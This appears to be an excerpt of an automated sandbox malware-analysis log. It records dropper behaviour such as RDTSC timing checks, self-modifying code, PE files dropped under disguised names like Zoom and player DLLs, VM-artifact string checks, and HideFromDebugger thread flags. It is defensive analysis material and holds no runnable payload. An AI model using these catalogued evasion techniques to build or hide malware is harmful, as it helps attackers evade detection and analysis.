Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80AFE second address: 4D80B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FC4CCEF6AE6h 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007FC4CCEF6AE0h 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC4CCEF6AE7h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B4A second address: 4D80B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B50 second address: 4D80B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B54 second address: 4D80B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, esi 0x0000000c mov di, ax 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FC4CC910592h 0x00000016 push dword ptr [ebp+14h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B80 second address: 4D80B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B84 second address: 4D80B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80B88 second address: 4D80B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80BEA second address: 4D80BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80BEE second address: 4D80BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80BF4 second address: 4D80C32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC4CC91058Eh 0x00000011 sub ax, 1FB8h 0x00000016 jmp 00007FC4CC91058Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e mov cx, 0185h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90CEE second address: 4D90CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90CF3 second address: 4D90CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90CF9 second address: 4D90D74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC4CCEF6ADEh 0x00000014 xor ch, FFFFFFA8h 0x00000017 jmp 00007FC4CCEF6ADBh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC4CCEF6AE8h 0x00000023 jmp 00007FC4CCEF6AE5h 0x00000028 popfd 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC4CCEF6ADDh 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Special instruction interceptor: First address: BBEC6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Special instruction interceptor: First address: BBECBC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Special instruction interceptor: First address: D5FB13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Special instruction interceptor: First address: D708E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Special instruction interceptor: First address: DEFB5A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9FEC6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9FECBC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: B9FB13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: BB08E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C2FB5A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Memory allocated: 2A00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Memory allocated: 2C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Memory allocated: 4C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Code function: 3_2_04E00342 rdtsc 3_2_04E00342
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3191 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5591 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libGLESv2.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ZoomUs\EOSSDK-Win64-Shipping.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053670001\8fb472f3d3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-U772O.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5PrintSupport.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053669001\b191a8c87b.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-7SCO6.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcr100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\is-8C04K.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcp100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-NNPOE.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-O3JN0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-MJUM6.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuuc51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5Concurrent.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053671001\0269e2f5f3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuin51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-JO5R4.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-9J3SL.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053672001\c9cd3322a0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-R7PP0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053662101\1e9cc73e62.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libEGL.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ZoomUs\Nda0ProtocolZoom.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ZoomUs\is-RCAI0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-LGLQ2.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053579001\4db43293bc.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ZoomUs\is-LV70G.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com API coverage: 4.2 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2144 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 380 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep count: 66 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep time: -132066s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7720 Thread sleep count: 79 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7720 Thread sleep time: -158079s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep count: 180 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep time: -5400000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704 Thread sleep count: 89 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704 Thread sleep time: -178089s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep time: -70035s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724 Thread sleep count: 85 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724 Thread sleep time: -170085s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com TID: 1512 Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com TID: 5616 Thread sleep count: 69 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406301 FindFirstFileW,FindClose, 11_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 11_2_00406CC7
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 28_2_0098E472
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 28_2_0098DC54
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 28_2_0099A087
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 28_2_0099A1E2
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 28_2_0099A570
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009966DC FindFirstFileW,FindNextFileW,FindClose, 28_2_009966DC
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0095C622 FindFirstFileExW, 28_2_0095C622
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 28_2_009973D4
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00997333 FindFirstFileW,FindClose, 28_2_00997333
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 28_2_0098D921
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00925FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 28_2_00925FC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\764661\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\764661
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: skotes.exe, skotes.exe, 0000000A.00000002.3557951700.0000000000B80000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: chrome.exe, 0000002E.00000002.3235784674.00002AD800B28000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000001.00000002.2181823407.00000000035F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh,
Source: chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
Source: jrgXmS0.exe, 00000026.00000003.3018415125.00000000006F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&0
Source: Macromedia.com, 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000001.00000002.2196176590.0000000007A80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}E
Source: skotes.exe, 0000000A.00000002.3535140516.00000000008BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWugWP
Source: chrome.exe, 0000002E.00000002.3235461744.00002AD800AA8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=45f5dbc9-8afa-4616-9812-fa95d639b8fb*
Source: chrome.exe, 0000002E.00000002.3235461744.00002AD800AA8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #ce added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=45f5dbc9-8afa-4616-9812-fa95d639b8fb*
Source: skotes.exe, 0000000A.00000002.3535140516.0000000000886000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000A.00000002.3535140516.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3517161138.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE, 00000003.00000002.2239126632.0000000000D40000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000004.00000002.2266265318.0000000000B80000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000005.00000002.2273526778.0000000000B80000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000A.00000002.3557951700.0000000000B80000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: chrome.exe, 0000002E.00000002.3235461744.00002AD800AA8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ce added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=45f5dbc9-8afa-4616-9812-fa95d639b8fb
Source: AchillesGuard.com, 0000001C.00000002.3560892474.00000000013AB000.00000004.00000020.00020000.00000000.sdmp, driver3.exe, 00000020.00000002.3222957219.0000020E7B37A000.00000004.00000020.00020000.00000000.sdmp, driver3.exe, 00000020.00000003.2975497090.0000020E7B38F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3224443779.0000019A1E5B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 0000002E.00000002.3235461744.00002AD800AA8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=45f5dbc9-8afa-4616-9812-fa95d639b8fb
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE System information queried: ModuleInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
